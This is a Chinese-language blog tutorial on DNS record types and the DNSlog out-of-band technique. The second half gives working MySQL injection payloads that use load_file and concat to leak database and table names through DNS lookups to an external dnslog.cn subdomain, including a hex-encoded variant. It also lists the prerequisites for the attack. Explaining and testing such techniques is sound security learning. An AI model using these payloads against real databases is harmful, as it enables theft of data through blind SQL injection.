快捷導(dǎo)航

DNSlog外帶原理及注入分析(最新推薦)

更新時(shí)間：2024年01月08日 14:48:39 作者：S1nJa

DNS的全稱是Domain?Name?System（網(wǎng)絡(luò)名稱系統(tǒng)），它作為將域名和IP地址相互映射，使人更方便地訪問(wèn)互聯(lián)網(wǎng)，最近一直聽(tīng)到DNSlog外帶原理等詞但對(duì)其原理一直只是自己的理解(回顯DNS請(qǐng)求后的日志)并沒(méi)有真正的了解過(guò)，所以這里做一下記錄，感興趣的朋友一起看看吧

DNS基本概念

DNS中不同域名類型概念

DNS的全稱是Domain Name System（網(wǎng)絡(luò)名稱系統(tǒng)），它作為將域名和IP地址相互映射，使人更方便地訪問(wèn)互聯(lián)網(wǎng)。當(dāng)用戶輸入某一網(wǎng)址如littlehann.com，網(wǎng)絡(luò)上的DNS Server會(huì)將該域名解析，并找到對(duì)應(yīng)的真實(shí)IP如101.37.97.51，使用戶可以訪問(wèn)這臺(tái)服務(wù)器上相應(yīng)的服務(wù)。

DNSlog就是存儲(chǔ)在DNS Server上的域名訪問(wèn)信息，它記錄著用戶對(duì)域名littlehann.com等的訪問(wèn)信息，類似日志文件。

按照解析類型分類，DNS域名有如下幾種：

A記錄：A (Address) 記錄是用來(lái)指定主機(jī)名（或域名）對(duì)應(yīng)的IP地址記錄。就是說(shuō)：通過(guò)A記錄，大家可以設(shè)置自己的不同域名轉(zhuǎn)到不同的IP上去。如：
- www.dns.la轉(zhuǎn)到IP 116.255.202.1
- web.dns.la 轉(zhuǎn)到IP 116.255.202.11
- mail.dns.la 轉(zhuǎn)到IP 116.255.202.111
MX記錄（Mail Exchange）：郵件交換記錄，用戶可以將該域名下的郵件服務(wù)器指向到自己的Mail Server上，然后即可自行操作控制所有的郵箱設(shè)置。
CNAME（Canonical Name）記錄：通常稱別名解析，可以將注冊(cè)的不同域名都轉(zhuǎn)到一個(gè)域名記錄上，由這個(gè)域名記錄統(tǒng)一解析管理，與A記錄不同的是，CNAME別名記錄設(shè)置的可以是一個(gè)域名的描述而不一定是IP地址。
URL（Uniform Resource Locator）轉(zhuǎn)發(fā)：網(wǎng)址轉(zhuǎn)發(fā)功能，如果您沒(méi)有一臺(tái)獨(dú)立的服務(wù)器（也就是沒(méi)有一個(gè)獨(dú)立的IP地址）或者您還有一個(gè)域名B，您想訪問(wèn)A域名時(shí)訪問(wèn)到B域名的內(nèi)容，這時(shí)您就可以通過(guò)URL轉(zhuǎn)發(fā)來(lái)實(shí)現(xiàn)。URL轉(zhuǎn)發(fā)可以轉(zhuǎn)發(fā)到某一個(gè)目錄下，甚至某一個(gè)文件上。而CNAME是不可以，這就是URL轉(zhuǎn)發(fā)和CNAME的主要區(qū)別所在。
NS（Name Server）：NS記錄是域名服務(wù)解析記錄，NS用來(lái)指定該域名由哪個(gè)DNS服務(wù)器來(lái)進(jìn)行解析，可以把一個(gè)域名的不同二級(jí)域名分別指向到不同的DNS系統(tǒng)來(lái)解析。
AAAA記錄：IPV6解析記錄，該記錄是將域名解析到一個(gè)指定的IPV6的IP上。

前言

最近一直聽(tīng)到DNSlog外帶原理等詞但對(duì)其原理一直只是自己的理解(回顯DNS請(qǐng)求后的日志)并沒(méi)有真正的了解過(guò)，所以這里做一下記錄。

DNSlog原理

DNS

DNS(Domain Name System)就是域名系統(tǒng)，負(fù)責(zé)把域名轉(zhuǎn)換成IP地址；例如向?yàn)g覽器訪問(wèn)a.com,瀏覽器就會(huì)將其解析成真實(shí)的IP訪問(wèn)對(duì)應(yīng)服務(wù)器上的服務(wù)。

DNSlog

DNSlog就是DNS的日志，DNS在域名解析的時(shí)候會(huì)留下域名和解析IP的記錄

DNSlog外帶原理

DNS在解析的時(shí)候會(huì)留下日志，我們將信息放在高級(jí)域名中，傳遞到自己這里，然后通過(guò)讀日志獲取信息。

所以這里跟最初的猜想基本一致，原理也就是通過(guò)DNS請(qǐng)求后，通過(guò)讀取日志來(lái)獲取我們的請(qǐng)求信息。

DNSlog注入

在搜索DNSlog原理時(shí)同時(shí)看到了DNSlog注入，所以本地測(cè)試一塊都了解一下

前置知識(shí)

Load_file

注入主要用到了Load_file函數(shù)，功能是讀取文件并返回文件內(nèi)容為字符串。(訪問(wèn)互聯(lián)網(wǎng)中的文件時(shí)，需要在最前面加上兩個(gè)斜杠 //)

使用本函數(shù)有幾個(gè)前提：
1、首先要有注入點(diǎn)
2、需要有root權(quán)限
3、數(shù)據(jù)庫(kù)有讀寫權(quán)限即：secure_file_priv=“”
4、得有請(qǐng)求url權(quán)限
5、還必須得是windows服務(wù)器

D盤中寫了個(gè)1.txt

通過(guò)load_file函數(shù)，讀取一下

select load_file('D:/1.txt')

concat

由于在通過(guò)load_file外帶時(shí)是無(wú)法執(zhí)行sql語(yǔ)句的，所以要通過(guò)concat函數(shù)，將執(zhí)行的sql語(yǔ)句,與DNS請(qǐng)求的url進(jìn)行拼接

select concat('Sentiment','\\',(select database()));

本地測(cè)試

通過(guò)DNSlog外帶數(shù)據(jù)庫(kù)信息

select load_file(concat('//',(select group_concat(table_name separator '_') from  information_schema.tables where table_schema=database()),'.je5i3a.dnslog.cn/1.txt'));

外帶表名

select load_file(concat('//',(select group_concat(table_name separator '_') from  information_schema.tables where table_schema=database()),'.je5i3a.dnslog.cn/1.txt'));

剩下的就是sql注入常規(guī)操作了，就不一一列舉了

局限性

通過(guò)本地測(cè)試后,發(fā)現(xiàn)了一些問(wèn)題，在url中傳遞字符有一定的局限性，很多字符是無(wú)法傳遞的，所以在外帶時(shí)，可以通過(guò)十六進(jìn)制編碼繞過(guò)符號(hào)的局限性

select load_file(concat('//',(select hex(group_concat(table_name separator '_')) from  information_schema.tables where table_schema=database()),'.je5i3a.dnslog.cn/1.txt'));